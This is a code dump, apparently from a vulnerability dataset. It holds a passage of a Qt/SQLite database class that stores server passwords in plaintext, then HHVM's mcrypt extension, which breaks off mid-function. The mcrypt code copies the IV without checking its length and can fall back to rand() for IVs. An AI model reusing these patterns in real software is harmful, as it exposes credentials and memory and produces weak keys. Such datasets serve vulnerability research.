query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_hash` ON `friends`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `muted` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `muted_hash` ON `muted`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `pingcache` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `ping` INTEGER)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `pingcache_host_port` ON `pingcache`(`hostname`,`port`)"));
query.exec(QLatin1String("DELETE FROM `comments` WHERE `seen` < datetime('now', '-1 years')"));
query.exec(QLatin1String("DELETE FROM `blobs` WHERE `seen` < datetime('now', '-1 months')"));
query.exec(QLatin1String("VACUUM"));
query.exec(QLatin1String("PRAGMA synchronous = OFF"));
query.exec(QLatin1String("PRAGMA journal_mode = TRUNCATE"));
query.exec(QLatin1String("SELECT sqlite_version()"));
while (query.next())
qWarning() << "Database SQLite:" << query.value(0).toString();
}
Database::~Database() {
QSqlQuery query;
query.exec(QLatin1String("PRAGMA journal_mode = DELETE"));
query.exec(QLatin1String("VACUUM"));
}
QList<FavoriteServer> Database::getFavorites() {
QSqlQuery query;
QList<FavoriteServer> ql;
query.prepare(QLatin1String("SELECT `name`, `hostname`, `port`, `username`, `password`, `url` FROM `servers` ORDER BY `name`"));
query.exec();
while (query.next()) {
FavoriteServer fs;
fs.qsName = query.value(0).toString();
fs.qsHostname = query.value(1).toString();
fs.usPort = static_cast<unsigned short>(query.value(2).toUInt());
fs.qsUsername = query.value(3).toString();
fs.qsPassword = query.value(4).toString();
fs.qsUrl = query.value(5).toString();
ql << fs;
}
return ql;
}
void Database::setFavorites(const QList<FavoriteServer> &servers) {
QSqlQuery query;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `servers`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `servers` (`name`, `hostname`, `port`, `username`, `password`, `url`) VALUES (?,?,?,?,?,?)"));
foreach(const FavoriteServer &s, servers) {
query.addBindValue(s.qsName);
query.addBindValue(s.qsHostname);
query.addBindValue(s.usPort);
query.addBindValue(s.qsUsername);
query.addBindValue(s.qsPassword);
query.addBindValue(s.qsUrl);
query.exec();
}
QSqlDatabase::database().commit();
}
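// --- Illustrative sketch (not part of the original file) --------------------
// getFavorites() and setFavorites() above form a simple load-modify-store
// cycle over the `servers` table. A hypothetical caller (the function name is
// made up) might use them like this:
static void renameFirstFavoriteSketch(Database &db, const QString &newName) {
    QList<FavoriteServer> favs = db.getFavorites();
    if (! favs.isEmpty()) {
        favs[0].qsName = newName;
        db.setFavorites(favs);
    }
}
// -----------------------------------------------------------------------------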
bool Database::isLocalMuted(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `hash` FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
while (query.next()) {
return true;
}
return false;
}
void Database::setLocalMuted(const QString &hash, bool muted) {
QSqlQuery query;
if (muted)
query.prepare(QLatin1String("INSERT INTO `muted` (`hash`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
QMap<QPair<QString, unsigned short>, unsigned int> Database::getPingCache() {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int> map;
query.prepare(QLatin1String("SELECT `hostname`, `port`, `ping` FROM `pingcache`"));
query.exec();
while (query.next()) {
map.insert(QPair<QString, unsigned short>(query.value(0).toString(), query.value(1).toUInt()), query.value(2).toUInt());
}
return map;
}
void Database::setPingCache(const QMap<QPair<QString, unsigned short>, unsigned int> &map) {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int>::const_iterator i;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `pingcache`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `pingcache` (`hostname`, `port`, `ping`) VALUES (?,?,?)"));
for (i = map.constBegin(); i != map.constEnd(); ++i) {
query.addBindValue(i.key().first);
query.addBindValue(i.key().second);
query.addBindValue(i.value());
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::seenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `comments` WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
if (query.next()) {
if (query.value(0).toInt() > 0) {
query.prepare(QLatin1String("UPDATE `comments` SET `seen` = datetime('now') WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
return true;
}
}
return false;
}
void Database::setSeenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `comments` (`who`, `comment`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
}
QByteArray Database::blob(const QByteArray &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `data` FROM `blobs` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next()) {
QByteArray qba = query.value(0).toByteArray();
query.prepare(QLatin1String("UPDATE `blobs` SET `seen` = datetime('now') WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
return qba;
}
return QByteArray();
}
void Database::setBlob(const QByteArray &hash, const QByteArray &data) {
if (hash.isEmpty() || data.isEmpty())
return;
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `blobs` (`hash`, `data`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(data);
query.exec();
}
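// --- Illustrative sketch (not part of the original file) --------------------
// blob()/setBlob() above act as a small content-addressed cache: entries are
// keyed by hash, reads refresh the `seen` timestamp, and the constructor's
// age-based DELETE later drops entries unused for a month. A hypothetical
// lookup-or-store wrapper (names are made up):
static QByteArray cachedOrStoreSketch(Database &db, const QByteArray &hash,
                                      const QByteArray &fresh) {
    QByteArray cached = db.blob(hash);
    if (! cached.isEmpty())
        return cached;
    db.setBlob(hash, fresh);
    return fresh;
}
// -----------------------------------------------------------------------------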
QStringList Database::getTokens(const QByteArray &digest) {
QList<QString> qsl;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `token` FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
qsl << query.value(0).toString();
}
return qsl;
}
void Database::setTokens(const QByteArray &digest, QStringList &tokens) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
query.prepare(QLatin1String("INSERT INTO `tokens` (`digest`, `token`) VALUES (?,?)"));
foreach(const QString &qs, tokens) {
query.addBindValue(digest);
query.addBindValue(qs);
query.exec();
}
}
QList<Shortcut> Database::getShortcuts(const QByteArray &digest) {
QList<Shortcut> ql;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `shortcut`,`target`,`suppress` FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
Shortcut sc;
QByteArray a = query.value(0).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qlButtons;
}
a = query.value(1).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qvData;
}
sc.bSuppress=query.value(2).toBool();
ql << sc;
}
return ql;
}
bool Database::setShortcuts(const QByteArray &digest, QList<Shortcut> &shortcuts) {
QSqlQuery query;
bool updated = false;
query.prepare(QLatin1String("DELETE FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
const QList<Shortcut> scs = shortcuts;
query.prepare(QLatin1String("INSERT INTO `shortcut` (`digest`, `shortcut`, `target`, `suppress`) VALUES (?,?,?,?)"));
foreach(const Shortcut &sc, scs) {
if (sc.isServerSpecific()) {
shortcuts.removeAll(sc);
updated = true;
query.addBindValue(digest);
QByteArray a;
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qlButtons;
}
query.addBindValue(a);
a.clear();
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qvData;
}
query.addBindValue(a);
query.addBindValue(sc.bSuppress);
query.exec();
}
}
return updated;
}
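// --- Illustrative sketch (not part of the original file) --------------------
// getShortcuts()/setShortcuts() above store the button list and target of each
// server-specific shortcut as QDataStream blobs pinned to version Qt_4_0, so
// the stored format does not depend on the Qt version in use. The encode and
// decode halves of that pattern as hypothetical helpers, shown here with
// QList<QVariant> as a stand-in element type and assuming the usual QtCore
// headers are visible in this file:
static QByteArray encodeButtonsSketch(const QList<QVariant> &buttons) {
    QByteArray a;
    QDataStream s(&a, QIODevice::WriteOnly);
    s.setVersion(QDataStream::Qt_4_0);
    s << buttons;
    return a;
}
static QList<QVariant> decodeButtonsSketch(QByteArray a) {
    QList<QVariant> buttons;
    QDataStream s(&a, QIODevice::ReadOnly);
    s.setVersion(QDataStream::Qt_4_0);
    s >> buttons;
    return buttons;
}
// -----------------------------------------------------------------------------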
const QMap<QString, QString> Database::getFriends() {
QMap<QString, QString> qm;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name`, `hash` FROM `friends`"));
query.exec();
while (query.next())
qm.insert(query.value(0).toString(), query.value(1).toString());
return qm;
}
const QString Database::getFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name` FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next())
return query.value(0).toString();
return QString();
}
void Database::addFriend(const QString &name, const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `friends` (`name`, `hash`) VALUES (?,?)"));
query.addBindValue(name);
query.addBindValue(hash);
query.exec();
}
void Database::removeFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
const QString Database::getDigest(const QString &hostname, unsigned short port) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `digest` FROM `cert` WHERE `hostname` = ? AND `port` = ?"));
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
return query.value(0).toString();
}
return QString();
}
void Database::setDigest(const QString &hostname, unsigned short port, const QString &digest) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `cert` (`hostname`,`port`,`digest`) VALUES (?,?,?)"));
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(digest);
query.exec();
}
void Database::setPassword(const QString &hostname, unsigned short port, const QString &uname, const QString &pw) {
QSqlQuery query;
query.prepare(QLatin1String("UPDATE `servers` SET `password` = ? WHERE `hostname` = ? AND `port` = ? AND `username` = ?"));
query.addBindValue(pw);
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(uname);
query.exec();
}
bool Database::getUdp(const QByteArray &digest) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `udp` WHERE `digest` = ? "));
query.addBindValue(digest);
query.exec();
if (query.next()) {
return (query.value(0).toInt() == 0);
}
return true;
}
void Database::setUdp(const QByteArray &digest, bool udp) {
QSqlQuery query;
if (! udp)
query.prepare(QLatin1String("REPLACE INTO `udp` (`digest`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `udp` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
}
bool Database::fuzzyMatch(QString &name, QString &user, QString &pw, QString &hostname, unsigned short port) {
QSqlQuery query;
if (! user.isEmpty()) {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `username` LIKE ? AND `hostname` LIKE ? AND `port`=?"));
query.addBindValue(user);
} else {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `hostname` LIKE ? AND `port`=?"));
}
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
user = query.value(0).toString();
if (pw.isEmpty())
pw = query.value(1).toString();
hostname = query.value(2).toString();
if (name.isEmpty())
name = query.value(3).toString();
return true;
} else {
return false;
}
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/bad_3579_0 |
crossvul-cpp_data_bad_2259_0 | /*
+----------------------------------------------------------------------+
| HipHop for PHP |
+----------------------------------------------------------------------+
| Copyright (c) 2010-2014 Facebook, Inc. (http://www.facebook.com) |
| Copyright (c) 1997-2010 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
*/
#include "hphp/runtime/base/base-includes.h"
#include "hphp/runtime/base/runtime-error.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define NON_FREE
#define MCRYPT2
#include <mcrypt.h>
namespace HPHP {
///////////////////////////////////////////////////////////////////////////////
class MCrypt : public SweepableResourceData {
public:
explicit MCrypt(MCRYPT td) : m_td(td), m_init(false) {
}
~MCrypt() {
MCrypt::close();
}
void sweep() FOLLY_OVERRIDE {
close();
}
void close() {
if (m_td != MCRYPT_FAILED) {
mcrypt_generic_deinit(m_td);
mcrypt_module_close(m_td);
m_td = MCRYPT_FAILED;
}
}
CLASSNAME_IS("mcrypt");
// overriding ResourceData
virtual const String& o_getClassNameHook() const { return classnameof(); }
MCRYPT m_td;
bool m_init;
};
typedef enum {
RANDOM = 0,
URANDOM,
RAND
} iv_source;
class mcrypt_data {
public:
std::string algorithms_dir;
std::string modes_dir;
};
static mcrypt_data s_globals;
#define MCG(n) (s_globals.n)
#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif
#define MCRYPT_OPEN_MODULE_FAILED(str) \
raise_warning("%s(): Module initialization failed", str);
static Variant php_mcrypt_do_crypt(const String& cipher, const String& key,
const String& data, const String& mode,
const String& iv, bool dencrypt,
char *name) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED(name);
return false;
}
/* Checking for key-length */
int max_key_length = mcrypt_enc_get_key_size(td);
if (key.size() > max_key_length) {
raise_warning("Size of key is too large for this algorithm");
}
int count;
int *key_length_sizes = mcrypt_enc_get_supported_key_sizes(td, &count);
int use_key_length;
char *key_s = nullptr;
if (count == 0 && key_length_sizes == nullptr) { // no size list: all key lengths up to the maximum are OK
use_key_length = key.size();
key_s = (char*)malloc(use_key_length);
memcpy(key_s, key.data(), use_key_length);
} else if (count == 1) { /* only the one listed key length is OK */
key_s = (char*)malloc(key_length_sizes[0]);
memset(key_s, 0, key_length_sizes[0]);
memcpy(key_s, key.data(), MIN(key.size(), key_length_sizes[0]));
use_key_length = key_length_sizes[0];
} else { /* determine the smallest supported key length >= the requested key length */
use_key_length = max_key_length; /* start with max key length */
for (int i = 0; i < count; i++) {
if (key_length_sizes[i] >= key.size() &&
key_length_sizes[i] < use_key_length) {
use_key_length = key_length_sizes[i];
}
}
key_s = (char*)malloc(use_key_length);
memset(key_s, 0, use_key_length);
memcpy(key_s, key.data(), MIN(key.size(), use_key_length));
}
mcrypt_free(key_length_sizes);
/* Check IV */
char *iv_s = nullptr;
int iv_size = mcrypt_enc_get_iv_size(td);
/* IV is required */
if (mcrypt_enc_mode_has_iv(td) == 1) {
if (!iv.empty()) {
if (iv_size != iv.size()) {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
} else {
iv_s = (char*)malloc(iv_size + 1);
memcpy(iv_s, iv.data(), iv_size);
}
} else {
raise_warning("%s(): The IV parameter must be as long as "
"the blocksize", name);
iv_s = (char*)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
}
}
int block_size;
unsigned long int data_size;
String s;
char *data_s;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (mcrypt_generic_init(td, key_s, use_key_length, iv_s) < 0) {
raise_warning("Mcrypt initialisation failed");
return false;
}
if (dencrypt) {
mdecrypt_generic(td, data_s, data_size);
} else {
mcrypt_generic(td, data_s, data_size);
}
/* freeing vars */
mcrypt_generic_end(td);
if (key_s != nullptr) {
free(key_s);
}
if (iv_s != nullptr) {
free(iv_s);
}
s.setSize(data_size);
return s;
}
static Variant mcrypt_generic(const Resource& td, const String& data,
bool dencrypt) {
MCrypt *pm = td.getTyped<MCrypt>();
if (!pm->m_init) {
raise_warning("Operation disallowed prior to mcrypt_generic_init().");
return false;
}
if (data.empty()) {
raise_warning("An empty string was passed");
return false;
}
String s;
unsigned char* data_s;
int block_size, data_size;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(pm->m_td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(pm->m_td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (dencrypt) {
mdecrypt_generic(pm->m_td, data_s, data_size);
} else {
mcrypt_generic(pm->m_td, data_s, data_size);
}
s.setSize(data_size);
return s;
}
///////////////////////////////////////////////////////////////////////////////
Variant HHVM_FUNCTION(mcrypt_module_open, const String& algorithm,
const String& algorithm_directory,
const String& mode, const String& mode_directory) {
MCRYPT td = mcrypt_module_open
((char*)algorithm.data(),
(char*)(algorithm_directory.empty() ? MCG(algorithms_dir).data() :
algorithm_directory.data()),
(char*)mode.data(),
(char*)(mode_directory.empty() ? (char*)MCG(modes_dir).data() :
mode_directory.data()));
if (td == MCRYPT_FAILED) {
raise_warning("Could not open encryption module");
return false;
}
return Resource(new MCrypt(td));
}
bool HHVM_FUNCTION(mcrypt_module_close, const Resource& td) {
td.getTyped<MCrypt>()->close();
return true;
}
Array HHVM_FUNCTION(mcrypt_list_algorithms,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_algorithms((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No algorithms found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
Array HHVM_FUNCTION(mcrypt_list_modes,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_modes((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No modes found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_block_size,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_block_size((char*)algorithm.data(),
(char*)dir.data());
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_key_size, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_key_size((char*)algorithm.data(),
(char*)dir.data());
}
Array HHVM_FUNCTION(mcrypt_module_get_supported_key_sizes,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
int *key_sizes = mcrypt_module_get_algo_supported_key_sizes
((char*)algorithm.data(), (char*)dir.data(), &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm((char*)algorithm.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_self_test, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_self_test((char*)algorithm.data(),
(char*)dir.data()) == 0;
}
Variant HHVM_FUNCTION(mcrypt_create_iv, int size, int source /* = 0 */) {
if (size <= 0 || size >= INT_MAX) {
raise_warning("Can not create an IV with a size of less than 1 or "
"greater than %d", INT_MAX);
return false;
}
int n = 0;
char *iv = (char*)calloc(size + 1, 1);
if (source == RANDOM || source == URANDOM) {
int fd = open(source == RANDOM ? "/dev/random" : "/dev/urandom", O_RDONLY);
if (fd < 0) {
free(iv);
raise_warning("Cannot open source device");
return false;
}
int read_bytes;
for (read_bytes = 0; read_bytes < size && n >= 0; read_bytes += n) {
n = read(fd, iv + read_bytes, size - read_bytes);
}
n = read_bytes;
close(fd);
if (n < size) {
free(iv);
raise_warning("Could not gather sufficient random data");
return false;
}
} else {
n = size;
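      // Fallback: fills the IV using libc rand() scaled to 0..255, which is
      // not a cryptographically secure source of randomness.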
while (size) {
iv[--size] = (char)(255.0 * rand() / RAND_MAX);
}
}
return String(iv, n, AttachString);
}
Variant HHVM_FUNCTION(mcrypt_encrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, false,
"mcrypt_encrypt");
}
Variant HHVM_FUNCTION(mcrypt_decrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, true,
"mcrypt_decrypt");
}
Variant HHVM_FUNCTION(mcrypt_cbc, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cbc() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cbc", iv, mode.toInt32(),
"mcrypt_cbc");
}
Variant HHVM_FUNCTION(mcrypt_cfb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cfb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cfb", iv, mode.toInt32(),
"mcrypt_cfb");
}
Variant HHVM_FUNCTION(mcrypt_ecb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ecb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ecb", iv, mode.toInt32(),
"mcrypt_ecb");
}
Variant HHVM_FUNCTION(mcrypt_ofb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ofb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ofb", iv, mode.toInt32(),
"mcrypt_ofb");
}
Variant HHVM_FUNCTION(mcrypt_get_block_size, const String& cipher,
const Variant& module /* = null_string */) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.asCStrRef().data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_block_size");
return false;
}
int64_t ret = mcrypt_enc_get_block_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_cipher_name, const String& cipher) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"ecb",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"stream",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_cipher_name");
return false;
}
}
char *cipher_name = mcrypt_enc_get_algorithms_name(td);
mcrypt_module_close(td);
String ret(cipher_name, CopyString);
mcrypt_free(cipher_name);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_iv_size, const String& cipher,
const String& mode) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_iv_size");
return false;
}
int64_t ret = mcrypt_enc_get_iv_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_key_size, const String& cipher,
const String& module) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_key_size");
return false;
}
int64_t ret = mcrypt_enc_get_key_size(td);
mcrypt_module_close(td);
return ret;
}
String HHVM_FUNCTION(mcrypt_enc_get_algorithms_name, const Resource& td) {
char *name = mcrypt_enc_get_algorithms_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_block_size, const Resource& td) {
return mcrypt_enc_get_block_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_iv_size, const Resource& td) {
return mcrypt_enc_get_iv_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_key_size, const Resource& td) {
return mcrypt_enc_get_key_size(td.getTyped<MCrypt>()->m_td);
}
String HHVM_FUNCTION(mcrypt_enc_get_modes_name, const Resource& td) {
char *name = mcrypt_enc_get_modes_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
Array HHVM_FUNCTION(mcrypt_enc_get_supported_key_sizes, const Resource& td) {
int count = 0;
int *key_sizes =
mcrypt_enc_get_supported_key_sizes(td.getTyped<MCrypt>()->m_td, &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm_mode, const Resource& td) {
return mcrypt_enc_is_block_algorithm_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm, const Resource& td) {
return mcrypt_enc_is_block_algorithm(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_mode, const Resource& td) {
return mcrypt_enc_is_block_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
int64_t HHVM_FUNCTION(mcrypt_enc_self_test, const Resource& td) {
return mcrypt_enc_self_test(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_generic_init, const Resource& td,
const String& key,
const String& iv) {
MCrypt *pm = td.getTyped<MCrypt>();
int max_key_size = mcrypt_enc_get_key_size(pm->m_td);
int iv_size = mcrypt_enc_get_iv_size(pm->m_td);
if (key.empty()) {
raise_warning("Key size is 0");
}
unsigned char *key_s = (unsigned char *)malloc(key.size());
memset(key_s, 0, key.size());
unsigned char *iv_s = (unsigned char *)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
int key_size;
if (key.size() > max_key_size) {
raise_warning("Key size too large; supplied length: %d, max: %d",
key.size(), max_key_size);
key_size = max_key_size;
} else {
key_size = key.size();
}
memcpy(key_s, key.data(), key.size());
if (iv.size() != iv_size) {
raise_warning("Iv size incorrect; supplied length: %d, needed: %d",
iv.size(), iv_size);
}
memcpy(iv_s, iv.data(), iv_size);
mcrypt_generic_deinit(pm->m_td);
int result = mcrypt_generic_init(pm->m_td, key_s, key_size, iv_s);
/* If this function fails, close the mcrypt module to prevent crashes
* when further functions want to access this resource */
if (result < 0) {
pm->close();
switch (result) {
case -3:
raise_warning("Key length incorrect");
break;
case -4:
raise_warning("Memory allocation error");
break;
